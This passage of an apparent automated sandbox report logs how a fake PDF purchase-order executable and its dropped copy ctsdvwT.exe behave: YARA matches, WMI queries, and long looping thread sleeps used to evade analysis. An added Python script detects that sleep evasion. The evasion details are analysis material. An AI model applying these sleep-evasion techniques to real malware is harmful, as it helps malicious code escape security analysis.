                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe  Process information set: NOOPENFILEERRORBOX (126 identical events in this span)

                    Malware Analysis System Evasion

                    Source: Yara match  File source: Process Memory Space: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe PID: 7192, type: MEMORYSTR
                    Source: Yara match  File source: Process Memory Space: ctsdvwT.exe PID: 7644, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe  WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe  WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe  WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe  Memory allocated (memory reserve | memory write watch) at: 2660000, 2850000, 2660000, 62A0000, 72A0000, 74F0000, 84F0000, 2A70000, 2CC0000, 2AF0000
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe  Memory allocated (memory reserve | memory write watch) at: 1540000, 3080000, 2ED0000, 6A60000, 7A60000, 7CB0000, 8CB0000, F60000, 2AF0000, 10C0000, 1310000, 2D60000, 4D60000, 6670000, 7670000, 78C0000, 88C0000, 1200000, 2C30000, 2B80000
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe  Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe  Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe  Thread delayed: delay time (51 successive calls): 2400000, 2399875, 2399765, 2399656, 2399531, 2399421, 2399312, 2399195, 2399093, 2398984, 2398874, 2398765, 2398653, 2398543, 2398432, 2398328, 2398188, 2398015, 2397906, 2397796, 2397687, 2397578, 2397468, 2397359, 2397250, 2397140, 2397031, 2396922, 2396810, 2396703, 2396594, 2396484, 2396375, 2396265, 2396156, 2396046, 2395937, 2395827, 2395714, 2395587, 2395465, 2395358, 2395250, 2395140, 2395031, 2394922, 2394812, 2394703, 2394593, 2394483, 2394375
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe  Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe  Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe  Thread delayed: delay time (successive calls): 2400000, 2399843, 2399734, 2399625, 2399515, 2399406, 2399296, 2399187, 2399076, 2398968, 2398859, 2398747, 2398560, 2398453, 2398343, 2398218, 2398109, 2398000, 2397890, 2397781, 2397672, 2397562, 2397452, 2397343, 2397234, 2397125, 2397015, 2396906, 2396797, 2396684, 2396577, 2396468, 2396359, 2396244, 2396133, 2396031
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395922Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395812Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395703Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395593Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395484Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395375Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395265Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395156Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395047Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394937Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394828Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394718Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394609Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394500Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394390Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2400000
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399890
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399778
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399656
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399484
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399349
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399224
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399094
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398984
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398875
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398747
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398625
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398516
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398391
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398266
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398156
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398047
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397937
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397828
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397719
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397609
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397500
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397390
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397281
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397172
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397052
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396922
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396812
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396703
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396594
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396469
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396359
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396250
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396141
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396031
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395922
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395812
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395703
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395593
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395484
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395375
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395265
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395156
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395042
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394937
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394825
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394718
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394541
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394437
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394328
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394218
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6350Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3321Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeWindow / User API: threadDelayed 3072Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeWindow / User API: threadDelayed 6779Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow / User API: threadDelayed 4658Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow / User API: threadDelayed 5193Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow / User API: threadDelayed 2572
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow / User API: threadDelayed 7283
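The rows above, and the "Thread sleep time" / "Thread sleep count" rows that follow, are the raw evidence behind the report's sleep-related verdicts, but the report does not total them per thread. The following Python script is an added example, not Joe Sandbox code and not part of the report: it parses rows in exactly these shapes (tolerating the fused extraction form and the trailing "Jump to behavior" link text), groups them by image path and thread id, and emits per-thread indicators. Two points it makes explicit that the raw rows only imply: the value 922337203685477 is Int64.MaxValue in 100 ns ticks divided down to milliseconds (the arithmetic is exact), so it is what a .NET TimeSpan.MaxValue wait looks like and should be treated as an unbounded wait rather than summed; and a run of requests such as 2400000, 2399890, 2399778 that shrinks by roughly 110 ms each time means every sleep returned long before it expired and the thread re-requested the remainder, which is how a sandbox's sleep-skipping shows up from the log side, with the first value (40 minutes here) being the sample's real target. The sample rows are constructed for this example (most numbers copied from this report, the benign.exe row invented as a negative case); the 180 s long-sleep threshold and the 5 s maximum countdown step are this example's assumptions, while the "> 30" loop threshold mirrors the comparison the report itself prints.

```python
"""Aggregate sandbox thread-sleep evidence per process and thread.

Added example (not Joe Sandbox code): parses rows shaped like the evidence
lines in this report and flags sleep-based sandbox evasion.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Int64.MaxValue in 100 ns ticks, expressed in whole milliseconds: the number a
# .NET TimeSpan.MaxValue wait produces in these logs. Anything this large is
# treated as an unbounded wait, not a measurable duration.
INFINITE_MS = (2**63 - 1) // 10_000  # 922337203685477

LOOP_THRESHOLD = 30            # mirrors the report's own "count > 30" comparison
LONG_SLEEP_MS = 180_000        # assumption for this example: 3 minutes
MAX_COUNTDOWN_STEP_MS = 5_000  # assumption: max gap between countdown requests

# Constructed rows in the report's shapes, including the fused extraction form
# (no space before "Thread delayed") and the trailing "Jump to behavior" text.
# benign.exe is an invented negative case; the other values come from the report.
SAMPLE_ROWS = r"""
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Thread delayed: delay time: 2400000
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Thread delayed: delay time: 2399890
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Thread delayed: delay time: 2399778
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Window / User API: threadDelayed 4658
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep count: 34 > 30
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2400000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2399843s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7528 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep count: 36 > 30
Source: C:\Users\user\Desktop\benign.exe TID: 100 Thread sleep time: -5000s >= -30000s
"""

ROW_RE = re.compile(
    r"^Source:\s*(?P<src>.+?)"       # image path, may contain spaces
    r"(?:\s+TID:\s*(?P<tid>\d+))?"   # optional thread id
    r"\s*(?P<kind>Thread delayed: delay time:"
    r"|Window / User API: threadDelayed"
    r"|Thread sleep time:"
    r"|Thread sleep count:)"
    r"\s*(?P<value>-?\d+)"           # ms (sleep time is logged negative) or a count
)


@dataclass
class SleepStats:
    delays_ms: list = field(default_factory=list)    # individual sleep requests
    loop_counts: list = field(default_factory=list)  # sleep-loop iteration counts


def parse_row(line):
    """Return (src, tid, kind, value) for one evidence row, or None otherwise."""
    line = line.strip().removesuffix("Jump to behavior").strip()
    m = ROW_RE.match(line)
    if not m:
        return None
    return m["src"].strip(), m["tid"], m["kind"], abs(int(m["value"]))


def aggregate(text):
    """Group rows by (image path, thread id); tid is None for rows without one."""
    stats = defaultdict(SleepStats)
    for line in text.splitlines():
        parsed = parse_row(line)
        if parsed is None:
            continue
        src, tid, kind, value = parsed
        if kind in ("Thread delayed: delay time:", "Thread sleep time:"):
            stats[(src, tid)].delays_ms.append(value)
        else:
            stats[(src, tid)].loop_counts.append(value)
    return dict(stats)


def is_countdown(delays):
    """Three or more strictly decreasing requests in small steps: the thread keeps
    asking for (deadline - now), i.e. its sleeps return early and it re-arms."""
    if len(delays) < 3:
        return False
    return all(0 < a - b <= MAX_COUNTDOWN_STEP_MS for a, b in zip(delays, delays[1:]))


def assess(s):
    """Summarise one (process, thread) and list the evasion indicators it shows."""
    finite = [d for d in s.delays_ms if d < INFINITE_MS]
    unbounded = len(s.delays_ms) - len(finite)  # TimeSpan.MaxValue-sized waits
    countdown = is_countdown(finite)
    flags = []
    if finite and max(finite) >= LONG_SLEEP_MS:
        flags.append("long_sleep")
    if any(c > LOOP_THRESHOLD for c in s.loop_counts):
        flags.append("sleep_loop")
    if unbounded:
        flags.append("unbounded_wait")
    if countdown:
        flags.append("deadline_countdown")
    return {
        "total_ms": sum(finite),
        "max_ms": max(finite, default=0),
        "unbounded_waits": unbounded,
        "deadline_ms": max(finite) if countdown else None,  # the original target
        "flags": flags,
    }


if __name__ == "__main__":
    for (src, tid), s in aggregate(SAMPLE_ROWS).items():
        print(f"{src} TID={tid}: {assess(s)}")
```

Run it as-is to see the sample rows scored; feed it the report's own rows (pasted into SAMPLE_ROWS or read from a file) to get one line per thread. Rows without a TID are grouped per image, so where the report lists the same image across several process instances those countdowns interleave and the countdown check may not fire for the merged group; the TID-qualified rows are the reliable place to read it.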
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7240 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7528 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep count: 36 > 30
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -33204139332677172s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2400000s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7544 Thread sleep count: 3072 > 30
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2399875s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7544 Thread sleep count: 6779 > 30
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2399765s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2399656s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2399531s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2399421s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2399312s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2399195s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2399093s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2398984s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2398874s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2398765s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2398653s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2398543s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2398432s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2398328s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2398188s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2398015s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2397906s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2397796s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2397687s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2397578s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2397468s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2397359s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2397250s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2397140s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2397031s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2396922s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2396810s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2396703s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2396594s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2396484s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2396375s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2396265s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2396156s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2396046s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2395937s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2395827s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2395714s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2395587s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2395465s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2395358s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2395250s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2395140s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2395031s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2394922s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2394812s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2394703s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2394593s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2394483s >= -30000s
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536 Thread sleep time: -2394375s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7664 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep count: 34 > 30
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2400000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7864 Thread sleep count: 4658 > 30
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2399843s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7864 Thread sleep count: 5193 > 30
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2399734s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2399625s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2399515s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2399406s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2399296s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2399187s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2399076s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2398968s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2398859s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2398747s >= -30000s
